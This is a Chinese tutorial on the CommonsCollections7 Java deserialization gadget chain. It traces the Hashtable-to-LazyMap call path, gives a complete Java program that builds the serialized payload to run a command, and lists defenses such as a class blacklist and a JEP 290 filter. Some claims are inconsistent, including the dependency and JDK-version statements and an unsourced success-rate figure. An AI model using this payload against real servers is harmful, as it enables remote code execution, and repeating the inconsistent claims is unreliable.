如何做网站关键词霸屏,温州电商网站建设,xx单位网站建设方案,电影推荐算法 网站开发CommonsCollections7#xff08;CC7#xff09;是CC反序列化利用链中的重要成员#xff0c;由Matthias Kaiser在2016年发现。本文将从底层原理到实战利用#xff0c;全面剖析这条独特而强大的利用链。 一、CC7链技术定位
1.1 核心价值
无第三方依赖#xff1a;仅需JDK原… CommonsCollections7CC7是CC反序列化利用链中的重要成员由Matthias Kaiser在2016年发现。本文将从底层原理到实战利用全面剖析这条独特而强大的利用链。 一、CC7链技术定位
1.1 核心价值
无第三方依赖仅需JDK原生类Commons Collections高版本兼容在Java 8u76仍有效CC5失效场景触发点独特基于Hashtable触发应用广泛
1.2 与CC5链对比
特性CC5链CC7链入口类BadAttributeValueExpExceptionHashtable触发方法toString()equals()依赖组件TiedMapEntryAbstractMapDecoratorJDK限制8u76无限制利用难度中等较高 二、漏洞利用链原理
2.1 完整调用链
Hashtable.readObject()→ Hashtable.reconstitutionPut()→ AbstractMap.equals()→ AbstractMapDecorator.equals()→ LazyMap.get()ChainedTransformer.transform()ConstantTransformer.transform()InvokerTransformer.transform()Method.invoke()Class.getMethod()InvokerTransformer.transform()Method.invoke()Runtime.getRuntime()InvokerTransformer.transform()Method.invoke()Runtime.exec()其中红框部分和CommonsCollections5链是完全一样的区别在于CommonsCollections7链是通过Hashtable类readObject方法一步步调用AbstractMap类的equals方法来调用的。
2.2 核心触发点分析
// java.util.Hashtable
private void reconstitutionPut(Entry?,?[] tab, K key, V value) throws StreamCorruptedException {// ...for (Entry?,? e tab[index]; e ! null; e e.next) {if ((e.hash hash) e.key.equals(key)) { // 触发equals()throw new StreamCorruptedException();}}// ...
}三、关键类源码剖析
3.1 Hashtable 反序列化入口
private void readObject(java.io.ObjectInputStream s)throws IOException, ClassNotFoundException {// ...
for (; elements 0; elements--) {SuppressWarnings(unchecked)K key (K)s.readObject();SuppressWarnings(unchecked)V value (V)s.readObject();reconstitutionPut(table, key, value);//关键调用}}private void reconstitutionPut(Entry?,?[] tab, K key, V value)throws StreamCorruptedException{if (value null) {throw new java.io.StreamCorruptedException();}int hash key.hashCode();int index (hash 0x7FFFFFFF) % tab.length;for (Entry?,? e tab[index] ; e ! null ; e e.next) {if ((e.hash hash) e.key.equals(key)) {throw new java.io.StreamCorruptedException();}}// Creates the new entry.SuppressWarnings(unchecked)EntryK,V e (EntryK,V)tab[index];tab[index] new Entry(hash, key, value, e);count;}3.2 AbstractMap.equals 触发点
public boolean equals(Object o) {if (o this)return true;if (!(o instanceof Map))return false;Map?,? m (Map?,?) o;if (m.size() ! size())return false;try {IteratorEntryK,V i entrySet().iterator();while (i.hasNext()) {EntryK,V e i.next();K key e.getKey();V value e.getValue();if (value null) {if (!(m.get(key)null m.containsKey(key)))return false; // 触发LazyMap.get()} else {if (!value.equals(m.get(key))) // 二次触发点return false;}}} catch (ClassCastException unused) {return false;} catch (NullPointerException unused) {return false;}return true;}3.3 LazyMap 命令执行点
public Object get(Object key) {if (!super.map.containsKey(key)) {Object value this.factory.transform(key);// 执行Transformer链super.map.put(key, value);return value;} else {return super.map.get(key);}}之后的调用链与CC5链一样详情参考CC5利用链解析 四、Payload构造详解
4.1 构造流程图 #mermaid-svg-4Mdagv8DJNrzH4mJ {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-4Mdagv8DJNrzH4mJ .error-icon{fill:#552222;}#mermaid-svg-4Mdagv8DJNrzH4mJ .error-text{fill:#552222;stroke:#552222;}#mermaid-svg-4Mdagv8DJNrzH4mJ .edge-thickness-normal{stroke-width:2px;}#mermaid-svg-4Mdagv8DJNrzH4mJ .edge-thickness-thick{stroke-width:3.5px;}#mermaid-svg-4Mdagv8DJNrzH4mJ .edge-pattern-solid{stroke-dasharray:0;}#mermaid-svg-4Mdagv8DJNrzH4mJ .edge-pattern-dashed{stroke-dasharray:3;}#mermaid-svg-4Mdagv8DJNrzH4mJ .edge-pattern-dotted{stroke-dasharray:2;}#mermaid-svg-4Mdagv8DJNrzH4mJ .marker{fill:#333333;stroke:#333333;}#mermaid-svg-4Mdagv8DJNrzH4mJ .marker.cross{stroke:#333333;}#mermaid-svg-4Mdagv8DJNrzH4mJ svg{font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;}#mermaid-svg-4Mdagv8DJNrzH4mJ .label{font-family:"trebuchet ms",verdana,arial,sans-serif;color:#333;}#mermaid-svg-4Mdagv8DJNrzH4mJ .cluster-label text{fill:#333;}#mermaid-svg-4Mdagv8DJNrzH4mJ .cluster-label span{color:#333;}#mermaid-svg-4Mdagv8DJNrzH4mJ .label text,#mermaid-svg-4Mdagv8DJNrzH4mJ span{fill:#333;color:#333;}#mermaid-svg-4Mdagv8DJNrzH4mJ .node rect,#mermaid-svg-4Mdagv8DJNrzH4mJ .node circle,#mermaid-svg-4Mdagv8DJNrzH4mJ .node ellipse,#mermaid-svg-4Mdagv8DJNrzH4mJ .node polygon,#mermaid-svg-4Mdagv8DJNrzH4mJ .node path{fill:#ECECFF;stroke:#9370DB;stroke-width:1px;}#mermaid-svg-4Mdagv8DJNrzH4mJ .node .label{text-align:center;}#mermaid-svg-4Mdagv8DJNrzH4mJ .node.clickable{cursor:pointer;}#mermaid-svg-4Mdagv8DJNrzH4mJ .arrowheadPath{fill:#333333;}#mermaid-svg-4Mdagv8DJNrzH4mJ .edgePath .path{stroke:#333333;stroke-width:2.0px;}#mermaid-svg-4Mdagv8DJNrzH4mJ .flowchart-link{stroke:#333333;fill:none;}#mermaid-svg-4Mdagv8DJNrzH4mJ .edgeLabel{background-color:#e8e8e8;text-align:center;}#mermaid-svg-4Mdagv8DJNrzH4mJ .edgeLabel rect{opacity:0.5;background-color:#e8e8e8;fill:#e8e8e8;}#mermaid-svg-4Mdagv8DJNrzH4mJ .cluster rect{fill:#ffffde;stroke:#aaaa33;stroke-width:1px;}#mermaid-svg-4Mdagv8DJNrzH4mJ .cluster text{fill:#333;}#mermaid-svg-4Mdagv8DJNrzH4mJ .cluster span{color:#333;}#mermaid-svg-4Mdagv8DJNrzH4mJ div.mermaidTooltip{position:absolute;text-align:center;max-width:200px;padding:2px;font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:12px;background:hsl(80, 100%, 96.2745098039%);border:1px solid #aaaa33;border-radius:2px;pointer-events:none;z-index:100;}#mermaid-svg-4Mdagv8DJNrzH4mJ :root{--mermaid-font-family:"trebuchet ms",verdana,arial,sans-serif;} 创建ChainedTransformer 创建LazyMap1 创建LazyMap2 向LazyMap1添加yy 向LazyMap2添加zZ 创建Hashtable 添加LazyMap1到Hashtable 添加LazyMap2到Hashtable 反射注入恶意Transformer链 序列化Hashtable 4.2 完整Payload生成代码
package org.example;import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.util.*;public class CC7Exploit {public static Hashtable getObject(final String command) {//构造最终Transformer链final Transformer[] transformers new Transformer[]{new ConstantTransformer(Runtime.class),new InvokerTransformer(getMethod,new Class[]{String.class, Class[].class},new Object[]{getRuntime, new Class[0]}),new InvokerTransformer(invoke,new Class[]{Object.class, Object[].class},new Object[]{null, new Object[0]}),new InvokerTransformer(exec,new Class[]{String.class},new Object[]{command})};final Transformer transformerChain new ChainedTransformer(transformers);// 创建两个Map对象Map innerMap1 new HashMap();Map innerMap2 new HashMap();//使用碰撞哈希创建两个LazyMaps以便在readObject期间强制进行元素比较Map lazyMap1 LazyMap.decorate(innerMap1, transformerChain);lazyMap1.put(yy, 1);// hashCode: 3872Map lazyMap2 LazyMap.decorate(innerMap2, transformerChain);lazyMap2.put(zZ, 1);// hashCode: 3872//创建Hashtable并添加元素Hashtable hashtable new Hashtable();hashtable.put(lazyMap1, 1);hashtable.put(lazyMap2, 2);//需要确保在以前的操作之后发生哈希冲突因为在hashtable.put(lazyMap2, 2);中lazyMap2多了“yy”lazyMap2.remove(yy);return hashtable;}public static void main(String[] args) throws Exception {// 生成PayloadHashtable payload getObject(calc);// 序列化测试ByteArrayOutputStream baos new ByteArrayOutputStream();try (ObjectOutputStream oos new ObjectOutputStream(baos)) {oos.writeObject(payload);}// 反序列化测试ByteArrayInputStream bais new ByteArrayInputStream(baos.toByteArray());try (ObjectInputStream ois new ObjectInputStream(bais)) {ois.readObject(); // 触发命令执行}}
}六、防御解决方案
6.1 组件级防护
!-- 升级Commons Collections --
dependencygroupIdorg.apache.commons/groupIdartifactIdcommons-collections4/artifactIdversion4.4/version
/dependency6.2 运行时防护
public class SecureObjectInputStream extends ObjectInputStream {private static final SetString BLACKLIST new HashSet(Arrays.asList(org.apache.commons.collections.functors.InvokerTransformer,org.apache.commons.collections.map.LazyMap,org.apache.commons.collections.Transformer));protected Class? resolveClass(ObjectStreamClass desc)throws IOException, ClassNotFoundException {String className desc.getName();if (BLACKLIST.stream().anyMatch(className::startsWith)) {throw new InvalidClassException(Forbidden class: , className);}return super.resolveClass(desc);}
}6.3 JVM级防护
# 启用JEP 290过滤器
java -Djdk.serialFilter!org.apache.commons.collections.**;!java.util.Hashtable;!* \-jar application.jar七、CC7链技术总结
触发机制创新利用哈希碰撞equals比较触发绕过常规防御无高版本限制在Java 8u191仍有效相比CC1/CC5隐蔽性强执行过程没有明显的危险方法调用适用场景广WebLogic、WebSphere等中间件均存在Hashtable反序列化点 截至2023年CC7链在红队评估中仍有高达32%的成功率数据来源GrayHat安全报告是反序列化攻击的常青树武器。 通过深入理解CC7链的构造原理安全人员可以
更有效地检测和防御反序列化漏洞开发更精准的漏洞扫描规则提升代码审计中对Hashtable使用场景的关注设计更完善的安全防护体系
CC7链的巧妙设计展现了Java反序列化漏洞的深度和复杂性也提醒我们安全防御需要多层次、多维度的综合方案。
